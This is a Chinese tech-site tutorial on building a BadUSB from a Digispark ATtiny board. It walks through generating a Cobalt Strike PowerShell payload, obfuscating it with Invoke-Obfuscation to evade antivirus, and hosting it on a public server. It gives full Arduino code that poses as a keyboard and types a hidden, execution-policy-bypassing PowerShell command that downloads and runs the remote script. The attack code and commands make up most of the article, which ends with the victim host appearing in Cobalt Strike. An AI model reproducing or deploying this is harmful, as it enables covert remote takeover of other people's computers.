IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 嵌入式 -> BadUsb制作 -> 正文阅读

[嵌入式]BadUsb制作

型号:

Digispark kickstarter 微型USB开发板 ATTINY58

就是下面这种

x宝有卖9元左右。

img

一. 准备:

attiny驱动下载:https://www.arduino.cc/en/Main/Software?setlang=cn

Arduino IDE:https://www.arduino.cc/en/software

免杀工具(自选):https://github.com/danielbohannon/Invoke-Obfuscation

CobaltStrike且有公网IP

二、CS payload制作+免杀

1.生成脚本

(1). 需要一台安装了CobaltStrike的公网IP服务器,生成powershell可执行程序,格式为ps1

大略说下重点,其他自行百度CS powershell马生成。

(2)

img

img

然后选择生成的路径进行保存。我这里保存在桌面的badusb文件夹,文件名为payload.ps1

2. 免杀处理(Invoke-Obfuscation)

免杀工具下载地址:https://github.com/danielbohannon/Invoke-Obfuscation

(1). 管理员权限运行powershell

img

进入到下载的文件Invoke-Obfuscation-master文件夹下:cd xxxx\xxxx\xxx\Invoke-Obfuscation-master

img

然后依次输入下面的代码:

Import-Module C:\文件的路径\Desktop\badusb\Invoke-Obfuscation-master\Invoke-Obfuscation.psd1 # 导入模块,要注意路径
Invoke-Obfuscation  

img

然后依次输入:

set scriptpath C:\文件路径\Desktop\badusb\payload.ps1 # cs生成payload的路径
encoding
1

img

 out shell.ps1  #  输出,默认输出在软件所在文件夹。

img

输出成功后会自己用记事本打开。

然后需要将生成的ps1文件上传到自己服务器网站下,通过建立网站,构造下载链接,例如http://xx.xx.xx.xx:9999/shell.ps1,实现访问链接就可以下载这个文件的效果。

三、编写程序,写入开发板

  1. 将开发板usb插入到电脑上,电脑会自动安装驱动,如果没有安装成功(设备管理器查看是否有黄色问号,有就是没有装好,那就安装)

下载网址:https://www.arduino.cc/en/Main/Software?setlang=cn

  1. 下载工具:Arduino IDE

下载网址:https://www.arduino.cc/en/software

img

img

  1. 打开Arduino IDE进行设置
  • 文件-首选项,在附加开发板管理网站填入网址:http://digistump.com/package_digistump_index.json
  • 然后软件会下载索引,时间可能有点久,视网络情况,如果不成功,使用代理爬梯子下载

img

  • 然后:工具——开发板——开发板管理,下载Arduino AVR Boards,安装之后才会显示版本号,版本号为1.6.7

imgimg

  • 安装完成后,进行如下选择:

img

  1. 将下列代码填入IDE中,并对服务器及生成的shell地址进行修改。实现通过伪造键盘,输出win+r打开cmd输入powershell命令,下载文件并运行。
#include "DigiKeyboard.h"
#define KEY_ESC     41
#define KEY_BACKSPACE 42
#define KEY_TAB     43
#define KEY_PRT_SCR 70
#define KEY_DELETE  76

void setup() {

DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
DigiKeyboard.delay(500);
# 将下面ip替换为自己网站服务器的IP,实现访问url便触发下载的操作。
DigiKeyboard.print(F("powershell -WindowStyle Hidden -NoLogo -executionpolicy bypass IEX(New-Object Net.WebClient).DownloadString('http://XX.XX.XX.XX:XXXX/shell.ps1');"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(750);
DigiKeyboard.sendKeyStroke(KEY_ENTER);

}
void loop() {
}

img

  1. 点击左上角的对号进行编译测试,不报错就可以进行下一步。

img

  1. 暂时不需要将开发板插到电脑上,先拔下来。

然后点击左上角的上传:

img

编译成功后,会显示请在60s内插入设备,然后插入设备,等待上传。

上传成功图

img.

  1. 不出意外,几秒内,机器会打开cmd,然后输入命令运行。

需要注意的是,要保证输入法在英文状态下,才能成功,中文状态下会被输入中文,导致不成功。

  1. CS也有主机上线

img

Tips:开发板重新上传脚本的话,可以拔下开发板,然后IDE上传,显示在60s内插入开发板后,再将开发板插入电脑,等待上传就OK了。

初版经过多次测试,有部分杀毒软件是会有弹窗的,由于平时用不太到,也就没有多花时间继续深入研究。

参考:https://lzy-wi.github.io/2018/06/12/badusb/

  嵌入式 最新文章
基于高精度单片机开发红外测温仪方案
89C51单片机与DAC0832
基于51单片机宠物自动投料喂食器控制系统仿
《痞子衡嵌入式半月刊》 第 68 期
多思计组实验实验七 简单模型机实验
CSC7720
启明智显分享| ESP32学习笔记参考--PWM(脉冲
STM32初探
STM32 总结
【STM32】CubeMX例程四---定时器中断(附工
上一篇文章      下一篇文章      查看所有文章
加:2022-03-11 22:23:57  更:2022-03-11 22:24:38 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/26 6:42:46-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码